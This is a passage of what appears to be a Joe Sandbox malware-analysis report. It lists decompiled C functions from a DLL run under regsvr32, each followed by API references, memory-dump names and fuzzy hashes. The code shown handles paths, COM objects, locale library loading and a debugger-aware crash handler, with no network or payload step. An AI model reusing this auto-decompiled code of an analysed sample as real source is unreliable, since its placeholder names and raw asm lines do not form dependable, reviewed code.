								L100013E3( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E1000A0B7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E100298FF( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1004763E(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

0x1002992a
0x1002992a
0x1002992a
0x10029931
0x10029935
0x1002993c
0x10029942
0x10029949
0x10029954
0x1002995a
0x10029960
0x10029965
0x1002996a
0x1002996c
0x1002996e
0x1002996e
0x1002996e
0x1002997c
0x00000000
0x00000000
0x1002998a
0x10029992
0x100299b1
0x100299b3
0x00000000
0x100299b5
0x100299be
0x100299c3
0x100299cc
0x100299d4
0x100299da
0x100299dc
0x10029a6e
0x10029a74
0x10029a7b
0x10029a7b
0x100299e2
0x100299f2
0x100299f8
0x100299fa
0x10029a12
0x10029a16
0x10029a19
0x10029a19
0x10029a1f
0x10029a23
0x00000000
0x10029a25
0x10029a2a
0x10029a30
0x10029a33
0x00000000
0x10029a35
0x10029a36
0x10029a3c
0x10029a40
0x00000000
0x10029a42
0x10029a42
0x10029a45
0x00000000
0x10029a47
0x10029a4b
0x10029a54
0x10029a58
0x10029a5a
0x00000000
0x10029a5c
0x10029a60
0x10029a60
0x10029a66
0x00000000
0x10029a6b
0x10029a5a
0x10029a45
0x10029a40
0x10029a33
0x100299fc
0x100299fc
0x10029a00
0x10029a05
0x10029a0b
0x00000000
0x10029a0b
0x100299fa
0x100299dc
0x10029994
0x10029999
0x100299a1
0x100299a5
0x100299aa
0x100299aa
0x100299aa
0x10029a7f
0x10029a87
0x10029a88
0x10029a89
0x10029a9e

APIs

__EH_prolog3.LIBCMT ref: 10029949
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 1002998A

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

PathIsUNCA.SHLWAPI(?), ref: 100299D4
GetVolumeInformationA.KERNEL32 ref: 100299F2
CharUpperA.USER32 ref: 10029A19
FindFirstFileA.KERNEL32(?,00000000), ref: 10029A2A
FindClose.KERNEL32(00000000), ref: 10029A36
lstrlenA.KERNEL32(?), ref: 10029A4B

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
Instruction ID: e6d24a488800c45a0210c296e119790506c70d007043d79cd7281b13a7672738
Opcode Fuzzy Hash: 2d133f7dd53ca02f4223dfed3d7f5fa10658c056192f086980df752fbbd6fbd5
Instruction Fuzzy Hash: EB41FF7190024AABEB00DBB4DC85BFF77BCFF053A4F500128F925E2191EB30AA44CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1000B79D Relevance: 10.7, APIs: 7, Instructions: 209
stringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1000B79D(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t89;
				intOrPtr _t90;
				signed int* _t95;
				intOrPtr* _t96;
				void* _t99;
				void* _t110;
				void* _t113;
				intOrPtr* _t115;
				intOrPtr* _t119;
				WCHAR* _t125;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t158;
				signed int _t163;
				void* _t165;
				intOrPtr _t169;
				intOrPtr* _t171;
				WCHAR* _t175;
				void* _t177;
				void* _t178;

				_t158 = __edx;
				_push(0x48);
				E100476B6(0x1008de4d, __ebx, __edi, __esi);
				_t137 =  *((intOrPtr*)(_t177 + 8));
				_t163 = 0;
				 *((intOrPtr*)(_t177 - 0x2c)) =  *((intOrPtr*)(_t177 + 0xc));
				 *(_t177 - 0x50) =  *(_t177 + 0x1c);
				 *(_t177 - 0x28) = 0;
				 *((intOrPtr*)(_t177 - 0x44)) = 0;
				 *((intOrPtr*)(_t177 - 0x40)) = 0;
				 *((intOrPtr*)(_t177 - 0x24)) = 0;
				 *(_t177 - 0x38) = 0;
				_t89 = L10020F57(__ecx, _t137, 0x100a488c);
				 *((intOrPtr*)(_t177 - 0x48)) = _t89;
				 *(_t177 - 0x3c) = 0 | _t89 != 0x00000000;
				_t90 = L10020F57(_t89 != 0, _t137, 0x100a47fc);
				_push(_t177 - 0x20);
				 *((intOrPtr*)(_t177 - 0x4c)) = _t90;
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x3c))() != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t163 = 0;
				}
				_t169 = 1;
				 *((intOrPtr*)( *_t137 + 0x40))(_t137, 1, _t177 - 0x28);
				if( *(_t177 - 0x3c) == _t163) {
					__eflags =  *((intOrPtr*)(_t177 - 0x2c)) - _t163;
					if( *((intOrPtr*)(_t177 - 0x2c)) == _t163) {
						_t113 =  *((intOrPtr*)( *_t137 + 0x20))(_t137, 4, 3, _t177 - 0x44);
						__eflags = _t113;
						if(_t113 == 0) {
							__imp__CreateBindCtx(_t163, _t177 - 0x40);
							_t115 =  *((intOrPtr*)(_t177 - 0x44));
							 *((intOrPtr*)( *_t115 + 0x50))(_t115,  *((intOrPtr*)(_t177 - 0x40)), _t163, _t177 - 0x2c);
							L10020F7B(_t177 - 0x40);
							goto L14;
						}
					}
				} else {
					_t185 =  *(_t177 - 0x28) - _t163;
					if( *(_t177 - 0x28) != _t163) {
						L1000AD75(_t177 - 0x24, E100184C0());
						 *(_t177 - 4) = _t163;
						E1000B503(_t177 - 0x24, 0xf094);
						_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1;
						_t125 = L1000A7A4( *((intOrPtr*)(_t177 - 0x24)), _t185,  *((intOrPtr*)( *((intOrPtr*)(_t177 - 0x24)) - 0xc)) + lstrlenW( *(_t177 - 0x28)) + 1, 2);
						_t186 = _t125 - _t163;
						 *(_t177 - 0x3c) = _t125;
						if(_t125 != _t163) {
							 *(_t177 - 0x54) =  *(E10049097(_t186));
							 *(E10049097(_t186)) = _t163;
							_t175 =  *(_t177 - 0x3c);
							L10048F79(_t175, _t173, _t173 - 1,  *((intOrPtr*)(_t177 - 0x24)),  *(_t177 - 0x28));
							_t178 = _t178 + 0x14;
							_t132 = E10049097(_t186);
							_t187 =  *_t132 - _t163;
							if( *_t132 == _t163) {
								 *(E10049097(__eflags)) =  *(_t177 - 0x54);
							} else {
								L1000AD19( *((intOrPtr*)(E10049097(_t187))));
							}
							__imp__CoTaskMemFree( *(_t177 - 0x28));
							 *(_t177 - 0x28) = _t175;
						}
						 *(_t177 - 4) =  *(_t177 - 4) | 0xffffffff;
						L100013E3( *((intOrPtr*)(_t177 - 0x24)) + 0xfffffff0, _t158);
						_t169 = 1;
					}
					_t119 =  *((intOrPtr*)(_t177 - 0x48));
					 *((intOrPtr*)( *_t119 + 0x20))(_t119, _t177 - 0x2c);
					L14:
					 *((intOrPtr*)(_t177 - 0x24)) = _t169;
				}
				_t95 =  *(_t177 - 0x50);
				if(_t95 == _t163) {
					_t96 =  *((intOrPtr*)(_t177 - 0x4c));
					__eflags = _t96 - _t163;
					if(_t96 == _t163) {
						L19:
						 *(_t177 - 0x34) = _t163;
						 *(_t177 - 0x30) = _t163;
					} else {
						_t110 =  *((intOrPtr*)( *_t96 + 0x24))(_t96,  *((intOrPtr*)(_t177 + 0x10)), 0xffffffff, _t163, _t177 - 0x34);
						__eflags = _t110;
						if(_t110 != 0) {
							goto L19;
						}
					}
				} else {
					 *(_t177 - 0x34) =  *_t95;
					 *(_t177 - 0x30) = _t95[1];
				}
				_push(_t177 - 0x38);
				_push( *((intOrPtr*)(_t177 + 0x10)));
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x58))() != 0) {
					 *(_t177 - 0x38) = _t163;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t99 = L1000AA09();
				_t171 = __imp__CoTaskMemFree;
				_t165 = _t99;
				 *_t171( *(_t177 - 0x28),  *((intOrPtr*)(_t177 + 0x10)),  *(_t177 - 0x34),  *(_t177 - 0x30),  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)),  *(_t177 - 0x38),  *(_t177 - 0x28),  *((intOrPtr*)(_t177 - 0x2c)));
				if( *((intOrPtr*)(_t177 - 0x24)) != 0) {
					 *_t171( *((intOrPtr*)(_t177 - 0x2c)));
				}
				L10020F7B(_t177 - 0x44);
				L10020F7B(_t177 - 0x48);
				L10020F7B(_t177 - 0x4c);
				return E10047739(_t137, _t165, _t171);
			}

0x1000b79d
0x1000b79d
0x1000b7a4
0x1000b7ac
0x1000b7af
0x1000b7b1
0x1000b7bd
0x1000b7c0
0x1000b7c3
0x1000b7c6
0x1000b7c9
0x1000b7cc
0x1000b7cf
0x1000b7e1
0x1000b7e4
0x1000b7e7
0x1000b7ef
0x1000b7f0
0x1000b7f5
0x1000b7fb
0x1000b805
0x1000b806
0x1000b807
0x1000b808
0x1000b809
0x1000b809
0x1000b813
0x1000b816
0x1000b81c
0x1000b8e4
0x1000b8e7
0x1000b8f4
0x1000b8f7
0x1000b8f9
0x1000b900
0x1000b906
0x1000b914
0x1000b91b
0x00000000
0x1000b91b
0x1000b8f9
0x1000b822
0x1000b822
0x1000b825
0x1000b834
0x1000b841
0x1000b844
0x1000b858
0x1000b85f
0x1000b864
0x1000b868
0x1000b86b
0x1000b874
0x1000b87c
0x1000b889
0x1000b88d
0x1000b892
0x1000b895
0x1000b89a
0x1000b89c
0x1000b8b5
0x1000b89e
0x1000b8a5
0x1000b8aa
0x1000b8ba
0x1000b8c0
0x1000b8c0
0x1000b8c6
0x1000b8cd
0x1000b8d4
0x1000b8d4
0x1000b8d5
0x1000b8df
0x1000b920
0x1000b920
0x1000b920
0x1000b923
0x1000b928
0x1000b937
0x1000b93a
0x1000b93c
0x1000b952
0x1000b952
0x1000b955
0x1000b93e
0x1000b94b
0x1000b94e
0x1000b950
0x00000000
0x00000000
0x1000b950
0x1000b92a
0x1000b92f
0x1000b932
0x1000b932
0x1000b95d
0x1000b95e
0x1000b961
0x1000b967
0x1000b969
0x1000b969
0x1000b98c
0x1000b98d
0x1000b98e
0x1000b98f
0x1000b990
0x1000b998
0x1000b99e
0x1000b9a0
0x1000b9a6
0x1000b9ab
0x1000b9ab
0x1000b9b1
0x1000b9ba
0x1000b9c3
0x1000b9cf

APIs

__EH_prolog3_GS.LIBCMT ref: 1000B7A4
lstrlenW.KERNEL32(?,0000F094,00000000), ref: 1000B84C
__snprintf_s.LIBCMT ref: 1000B88D
CoTaskMemFree.OLE32(?), ref: 1000B8BA

Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097

CreateBindCtx.OLE32(00000000,?), ref: 1000B900
CoTaskMemFree.OLE32(?), ref: 1000B9A0
CoTaskMemFree.OLE32(?), ref: 1000B9AB

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeTask$BindCreateH_prolog3___getptd_noexit__snprintf_slstrlen
String ID:
API String ID: 2341559186-0
Opcode ID: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
Instruction ID: 731885473514ceb126aa7af1581c9c99ad427e6226d60a221b743c0619bdfa44
Opcode Fuzzy Hash: c1dee482e81fc3de72b0be31839e8261954ebef90ab5afc6c2a4624c5598f9ac
Instruction Fuzzy Hash: 607122B5D00619EFDF11DFE4C8849EEBBBAFF89350B24415AF501AB265DB31A901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10019571 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10019571(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x100b9e70; // 0x6fb3f782
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(L1004C6C3(__edx,  &_v288, 4, "LOC"));
					L1000135C(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10049097(_t39));
					 *(E10049097(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E1004C1D3( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10049097(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10049097(__eflags)) = _t34;
					} else {
						L1000AD19( *((intOrPtr*)(E10049097(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1004763E(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x10019571
0x10019571
0x10019571
0x10019571
0x1001957a
0x10019581
0x10019584
0x1001958c
0x10019594
0x10019608
0x1001960a
0x00000000
0x00000000
0x1001960c
0x10019596
0x100195a3
0x100195a4
0x100195a9
0x100195ac
0x100195ac
0x100195ad
0x100195b3
0x100195ba
0x100195ca
0x100195df
0x100195e1
0x100195e6
0x100195e9
0x10019613
0x100195eb
0x100195f2
0x100195f7
0x10019618
0x1001962d
0x1001962d
0x1001961e
0x10019625
0x10019625
0x1001962f
0x10019630
0x10019630
0x1001963d

APIs

_strcpy_s.LIBCMT ref: 1001959E

Part of subcall function 10049097: __getptd_noexit.LIBCMT ref: 10049097

__snprintf_s.LIBCMT ref: 100195D7

Part of subcall function 1004C1D3: __vsnprintf_s_l.LIBCMT ref: 1004C1E8

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10019602
LoadLibraryA.KERNEL32(?), ref: 10019625

Strings

LOC, xrefs: 10019596

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 3864805678-519433814
Opcode ID: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
Instruction ID: 212530b40b3413e9381a31f2f5a97131ffea2fc55ce2f64732fe8a4d9ea1e514
Opcode Fuzzy Hash: 6594c7518ffc80edd72be3ad7d85f5af8eab506f016d828ffb66156ef1f4dc22
Instruction Fuzzy Hash: 6111D3B5900218AEDB11DB70CC86BDD37ACEF01355F2100B1F605EB092DA74EA858BA5

Uniqueness

Uniqueness Score: -1.00%

Function 1004763E Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1004763E(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x100b9e70; // 0x6fb3f782
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x100be548 = _t6;
				 *0x100be544 = _t22;
				 *0x100be540 = _t25;
				 *0x100be53c = _t21;
				 *0x100be538 = _t27;
				 *0x100be534 = _t26;
				 *0x100be560 = ss;
				 *0x100be554 = cs;
				 *0x100be530 = ds;
				 *0x100be52c = es;
				 *0x100be528 = fs;
				 *0x100be524 = gs;
				asm("pushfd");
				_pop( *0x100be558);
				 *0x100be54c =  *_t31;
				 *0x100be550 = _v0;
				 *0x100be55c =  &_a4;
				 *0x100be498 = 0x10001;
				_t11 =  *0x100be550; // 0x0
				 *0x100be44c = _t11;
				 *0x100be440 = 0xc0000409;
				 *0x100be444 = 1;
				_t12 =  *0x100b9e70; // 0x6fb3f782
				_v812 = _t12;
				_t13 =  *0x100b9e74; // 0x904c087d
				_v808 = _t13;
				 *0x100be490 = IsDebuggerPresent();
				_push(1);
				L10062721(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100a12d8);
				if( *0x100be490 == 0) {
					_push(1);
					L10062721(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x1004763e
0x1004763e
0x1004763e
0x1004763e
0x1004763e
0x1004763e
0x1004763e
0x10047644
0x10047646
0x10047646
0x10051ae5
0x10051aea
0x10051af0
0x10051af6
0x10051afc
0x10051b02
0x10051b08
0x10051b0f
0x10051b16
0x10051b1d
0x10051b24
0x10051b2b
0x10051b32
0x10051b33
0x10051b3c
0x10051b44
0x10051b4c
0x10051b57
0x10051b61
0x10051b66
0x10051b6b
0x10051b75
0x10051b7f
0x10051b84
0x10051b8a
0x10051b8f
0x10051b9b
0x10051ba0
0x10051ba2
0x10051baa
0x10051bb5
0x10051bc2
0x10051bc4
0x10051bc6
0x10051bcb
0x10051bdf

APIs

IsDebuggerPresent.KERNEL32 ref: 10051B95
SetUnhandledExceptionFilter.KERNEL32 ref: 10051BAA
UnhandledExceptionFilter.KERNEL32(100A12D8), ref: 10051BB5
GetCurrentProcess.KERNEL32(C0000409), ref: 10051BD1
TerminateProcess.KERNEL32(00000000), ref: 10051BD8

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
Instruction ID: e741ea3e61d09aa0f8a454da4e742f38b60909009e684e33022972ac0ce8d015
Opcode Fuzzy Hash: 500806440b6f5c9c282f01871ea2c3057755e7dcf7f599cfed5551d0f8a355ac
Instruction Fuzzy Hash: F121BCBC401AA4DFF320DF68D9C56C43BB0FB09348F50565AE90A922A1E7B46D858F16

Uniqueness

Uniqueness Score: -1.00%

Function 100145C3 Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100145C3(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E100177F8(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E10013F46(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = L10012730();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x100145c6
0x100145d2
0x1001461a
0x1001461c
0x10014623
0x00000000
0x10014625
0x100145d9
0x100145dd
0x00000000
0x00000000
0x100145df
0x100145ec
0x00000000
0x10014600
0x1001460f
0x00000000
0x10014617

APIs

Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803

GetKeyState.USER32(00000010), ref: 100145E7
GetKeyState.USER32(00000011), ref: 100145F0
GetKeyState.USER32(00000012), ref: 100145F9
SendMessageA.USER32 ref: 1001460F

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
Instruction ID: 6e61cc1eb6a95425632292877bab435b541be555978035ebcc8d7c4d1af18e25
Opcode Fuzzy Hash: 95f1b131c0c2e130cfe50c6eb6efd6780e38a756da53206ae19ccfbb14021f1c
Instruction Fuzzy Hash: 49F0E93A78029A25E610BE744C41FDE11A4DFC2FD5F030534E642EE0E2CDB0C8821575

Uniqueness

Uniqueness Score: -1.00%

Function 1003B247 Relevance: 4.6, APIs: 3, Instructions: 64
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E1003B247(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				intOrPtr _t24;
				void* _t25;
				intOrPtr _t26;
				signed int _t27;
				void* _t31;
				intOrPtr* _t32;
				void* _t37;
				void* _t40;
				intOrPtr* _t41;

				_t34 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t41 = __imp__CoCreateInstance;
				_t32 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = 1;
				_t21 =  *_t41(_a4, 0, 0x17, 0x100a594c,  &_v8, _t37, _t40, _t31, __ecx, __ecx);
				_v12 = _t21;
				if(_t21 == 0x80070057) {
					_t21 =  *_t41(_a4, 0, 7, 0x100a594c,  &_v8);
					_v12 = _t21;
				}
				if(_v12 < 0) {
					L5:
					L10020F7B( &_v8);
					_t24 = _a8;
					if(_t24 != 0) {
						 *((intOrPtr*)(_t24 + 8)) = _v12;
					}
					_t25 = 0;
				} else {
					__imp__OleRun(_v8);
					_v12 = _t21;
					if(_t21 < 0) {
						goto L5;
					} else {
						_t26 = L10020F57(_t34, _v8, 0x100a4a1c);
						 *_t32 = _t26;
						if(_t26 != 0) {
							_t27 = _v8;
							 *((intOrPtr*)( *_t27 + 8))(_t27);
							_t25 = 1;
						} else {
							goto L5;
						}
					}
				}
				return _t25;
			}

0x1003b247
0x1003b24c
0x1003b252
0x1003b26a
0x1003b26c
0x1003b273
0x1003b27a
0x1003b27d
0x1003b28b
0x1003b28d
0x1003b28d
0x1003b294
0x1003b2b9
0x1003b2bd
0x1003b2c2
0x1003b2c7
0x1003b2cc
0x1003b2cc
0x1003b2cf
0x1003b296
0x1003b299
0x1003b2a1
0x1003b2a4
0x00000000
0x1003b2a6
0x1003b2ae
0x1003b2b5
0x1003b2b7
0x1003b2d3
0x1003b2d9
0x1003b2de
0x00000000
0x00000000
0x00000000
0x1003b2b7
0x1003b2a4
0x1003b2e3

APIs

CoCreateInstance.OLE32(?,00000000,00000017,100A594C,00000000), ref: 1003B273
CoCreateInstance.OLE32(?,00000000,00000007,100A594C,00000001), ref: 1003B28B
OleRun.OLE32(00000001), ref: 1003B299

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
